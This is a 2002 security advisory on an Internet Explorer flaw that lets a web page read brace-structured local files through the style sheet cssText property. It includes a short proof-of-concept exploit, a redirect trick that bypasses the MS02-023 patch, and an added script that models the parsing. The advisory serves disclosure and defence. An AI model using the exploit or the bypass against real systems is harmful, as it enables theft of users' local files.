
GreyMagic Security Advisory GM#004-IE

By GreyMagic Software, Israel.
02 Apr 2002.

Topic: Reading portions of local files, depending on structure.

Discovery date: 18 Feb 2002.

Affected applications:

All tested versions of Microsoft Internet Explorer (IE5+).

Introduction:

Cascading Style Sheets (CSS) control how HTML elements are rendered; they let developers separate content (HTML) from presentation.

CSS can be attached to a document in several ways. One of them is to keep the style sheet in an external file and reference it from the document, either with the <link> element or with the seldom used @import CSS rule.

Discussion:

Using the cssText property of the styleSheet object it is possible to read portions (and sometimes the whole) of files from local or remote locations.

Almost any file that contains a curly-bracket ("{") character will be accepted by IE's CSS engine when it is referenced as a style sheet; the parsed result can then be read back through the cssText property.

The problem is that declarations the engine does not recognise as valid CSS are kept in cssText even though they have no functional effect, which gives a malicious page access to that content.

The problem is most apparent with C-style source files (Java, Perl, C#, etc.) and with the configuration files of many services (DNS server configuration, for example), since both are built from brace-delimited blocks.
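As an added illustration, not GreyMagic's demonstration code and not a description of IE's actual CSS engine, the script below models the behaviour described above: a parser that accepts any text containing "{", splits it into "selector { declarations }" blocks, and keeps the declarations it cannot interpret. The named.conf-style file, the C file and the plain-text note are constructed for this example, and the brace/semicolon tokenisation is an assumed simplification. Running it shows which portions of each file would surface in cssText, and why a file without braces yields nothing.

```javascript
// Added illustration for this advisory; not GreyMagic's demo page and not
// IE's real CSS engine. Models the behaviour the advisory describes: treat
// any text containing "{" as a style sheet, split it into blocks, and keep
// declarations that are not valid CSS. Assumptions (not from the advisory):
// blocks are delimited by balanced "{" / "}", declarations by ";", and
// whitespace is collapsed the way a serialised cssText would be.

function modelCssText(text) {
  const rules = [];
  let i = 0;
  for (;;) {
    const open = text.indexOf("{", i);
    if (open === -1) break;
    // Everything since the previous block becomes the "selector": for a C
    // file that is the whole preamble (includes, globals, signature).
    const selector = text
      .slice(i, open)
      .replace(/^[\s;]+/, "")
      .replace(/\s+/g, " ")
      .trim();
    // Consume the balanced block; nested braces (C code) are swallowed whole.
    let depth = 1;
    let j = open + 1;
    while (j < text.length && depth > 0) {
      if (text[j] === "{") depth += 1;
      else if (text[j] === "}") depth -= 1;
      j += 1;
    }
    const body = text.slice(open + 1, depth === 0 ? j - 1 : j);
    // Invalid "declarations" are kept rather than discarded.
    const decls = body
      .split(";")
      .map((d) => d.replace(/\s+/g, " ").trim())
      .filter((d) => d.length > 0);
    rules.push({ selector, decls });
    i = j;
  }
  return rules;
}

// Serialise the rules the way a cssText string would present them.
function serialise(rules) {
  return rules
    .map((r) => `${r.selector} { ${r.decls.join("; ")} }`)
    .join("\n");
}

// Mirrors the advisory's alert(cssText || "Could not extract ...") check.
function sniff(text) {
  return serialise(modelCssText(text)) || "Could not extract any text from file.";
}

// Constructed sample "local files" (not real data).
const SAMPLE_NAMED_CONF = `zone "example.com" {
    type master;
    file "db.example.com";
};
zone "example.net" {
    type slave;
    file "slave/db.example.net";
};`;

const SAMPLE_C = `#include <stdio.h>
static const char *secret = "hunter2";
int main(void) {
    printf("%s\\n", secret);
    return 0;
}`;

const SAMPLE_PLAIN = "Meeting notes: nothing here uses braces.";

if (typeof module !== "undefined" && require.main === module) {
  const samples = [
    ["named.conf", SAMPLE_NAMED_CONF],
    ["main.c", SAMPLE_C],
    ["notes.txt", SAMPLE_PLAIN],
  ];
  for (const [name, content] of samples) {
    console.log(`--- ${name} ---\n${sniff(content)}`);
  }
}
```

The C sample shows the "sometimes whole" case: everything before the first brace is collapsed into the selector, so the hard-coded secret leaks along with the function body. The plain-text note produces no rules, which is the "Could not extract any text from file" path the advisory's demo reports for files that are not structured in a way the engine accepts.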

Update (17-May-2002):

Microsoft finally released a patch for this vulnerability. Unfortunately, on some systems it is extremely weak: Microsoft's new "protection" can be circumvented by using a URL that redirects to the local file instead of referencing the local file directly.

A new demonstration, which retrieves local files even with MS02-023 installed, has been added. Click the "Redirect and Sniff" button instead of the old "Sniff" one.

Exploit:

This example attempts to read content from "c:/test.txt".

<link id="oFile" rel="stylesheet" href="file://c:/test.txt" disabled>
<script language="jscript">
onload=function () {
    // The sheet is disabled, so it is never applied to this page, yet the
    // target is still fetched and parsed; cssText returns whatever survived.
    alert(document.styleSheets.oFile.cssText || "Could not extract any text from file.");
}
</script>

For the above exploit to work after MS02-023 has been applied, simply assign to the "href" attribute a URL that redirects to "file://c:/test.txt".

Solution:

Microsoft was first informed on 18 Feb 2002 (44 days ago); they have opened an investigation into this issue and will probably release a patch in the near future.

Until a patch becomes available the only workaround is to disable Active Scripting. (See the update above: MS02-023 blocks direct file:// references but not URLs that redirect to them, so this workaround remains relevant even after patching.)

Tested on:

IE5 NT4.
IE5.5 Win98.
IE5.5 NT4.
IE6 Win2000.
IE6 WinXP.

Demonstration:

After installing MS02-023 the "Sniff" button should give you "Access is denied". However, "Redirect and Sniff" will still return the file contents (or "Could not extract any text from file" if the file is not structured in a way the CSS engine accepts):

Disclaimer:

The information in this security advisory and any of its demonstrations is provided "as is" without warranty of any kind.

Vulnerability details are provided strictly for educational and defensive purposes.

GreyMagic Software is not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory.


Copyright © 2008 GreyMagic Software